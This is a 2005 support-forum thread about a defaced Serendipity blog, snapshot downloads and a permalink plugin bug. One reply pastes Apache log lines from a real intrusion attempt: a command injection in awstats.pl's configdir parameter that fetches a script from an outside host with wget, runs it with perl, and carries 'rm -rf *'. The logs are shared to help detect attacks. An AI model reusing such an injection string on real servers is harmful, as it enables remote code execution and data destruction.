I guess I've been owned! My website was doing fine and I got home tonight to find it only now says:
XTech Inc
And I guess I'm not the only one. Anybody else have the same problem and know what to do about it before I spend too much time trying to figure it out? My domain name is www.thecockrells.com.
XTech Inc
Well it seems replacing the index.php got my site back up and running but I hope that's all it messed up. Anybody else have this problem? Anybody know why or how this could have happened? I did a search for XTech Inc and found that they have defaced a bunch of websites recently. I was running a nightly snapshot dated 20050613 if that helps anyone.
Hi,davecjr wrote:I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
thx in advance...
Version 0.9 isn't to beta yet...it's currently at alpha-3. That said, it's what I use as my main blog, so it's pretty stable.
Snapshots for developmental versions are usually at http://s9y.org/12.html, but I assume because of the hardware problems with the server, the snapshots aren't working right.
You can grab the sources from SVN if you really want, but I'd just recomend upgrading to 0.8.2 from the tarball on the s9y downloads page...
This is just my being curious, but have you checked your webserver logs to see how it was compromised? The easiest way, if you have apache, is to grep -R 'wget' /var/log/apache*, as most of the script kiddies try to use wget...
I may not have mentioned it but I am on 9 alpha 3 and I was using the snapshot dated 0613 but didn't know where I could download the entire zip since they weren't listed on http://s9y.org/12.html anymore.
I did look through the logs but I don't guess I know what I'm looking for.
I did look through the logs but I don't guess I know what I'm looking for.
Sorry...missed that you were running a snapshot...
You could use SVN to directly download s9y from berlios. Look at http://developer.berlios.de/svn/?group_id=2573 for information.
About the logs, what you're looking for is anything that's "funny." Something that is very, very funny is that there are wget commands in an apache error or access log. A server I admin was recently hacked because a user installed an old, insecure version of a stats program. This is what the hacking attempted looked like in my logs:
This is all very funny for apache to be doing...
You could use SVN to directly download s9y from berlios. Look at http://developer.berlios.de/svn/?group_id=2573 for information.
About the logs, what you're looking for is anything that's "funny." Something that is very, very funny is that there are wget commands in an apache error or access log. A server I admin was recently hacked because a user installed an old, insecure version of a stats program. This is what the hacking attempted looked like in my logs:
Code: Select all
access.log:
66.159.247.81 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf
*| HTTP/1.1" 400 373 "-" "-"
error.log:
[Mon Jun 27 18:57:00 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 19:01:57 2005] [error] mod_gzip: TRANSMIT_ERROR:0
--19:59:40-- http://lamer.biz/sesssiune
=> `sesssiune'
Resolving lamer.biz... 82.165.128.204
Connecting to lamer.biz[82.165.128.204]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,811 [text/plain]
0K .......... .......... 100% 293.60 KB/s
19:59:40 (293.60 KB/s) - `sesssiune' saved [20811/20811]
sh: line 1: /awstats.main.conf: No such file or directory
[Mon Jun 27 19:59:44 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesssiune;perl%20sesssiune;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 20:04:41 2005] [error] mod_gzip: TRANSMIT_ERROR:0
I didn't notice anything that I thought was too funny but will dig more. I had something else happen today that I hope isn't related but I haven't done anything else but post an article since I fixed the XTech problem.
Could this be related to permalink problems? I added the permalink plugin a while ago but never really used it. I added an article to my blog this morning and now all my links to articles just point to:
http://www.thecockrells.com/blog/permalink/UNKNOWN.html
If it isn't possible for something like this to be related to the xml-rpc issue, any ideas?!
Again thanks in advance...
Could this be related to permalink problems? I added the permalink plugin a while ago but never really used it. I added an article to my blog this morning and now all my links to articles just point to:
http://www.thecockrells.com/blog/permalink/UNKNOWN.html
If it isn't possible for something like this to be related to the xml-rpc issue, any ideas?!
Again thanks in advance...
-
garvinhicking
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Indeed, it slipped my mind when having patched the plugin to adjust the right permalink to use if a permalink is non-unique.
Will change this this weekend
Regards,
Garvin
Will change this this weekend
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
I thought it had to be installed for some other plugins like the contact form but outside of that, I haven't used it but had considered using it. I just wonder why it started acting funny today. Like I said, I've had it installed for a little while now and never changed anything associated with it and this just started acting like this today.
I'll just uninstall anyway. Earlier I asked about a place to download a snapshot as a single download like you once could. I appreciate someone pointing me to the Berlios site but I had already looked there and couldn't find a way to download the entire package instead of single files. Am I missing something or is that just not available anymore?
Thanks
I'll just uninstall anyway. Earlier I asked about a place to download a snapshot as a single download like you once could. I appreciate someone pointing me to the Berlios site but I had already looked there and couldn't find a way to download the entire package instead of single files. Am I missing something or is that just not available anymore?
Thanks
-
garvinhicking
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
The snapshots are currently not available, that is right. They will be put online again once our server is running at full speed again.
Regards,
Garvin
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/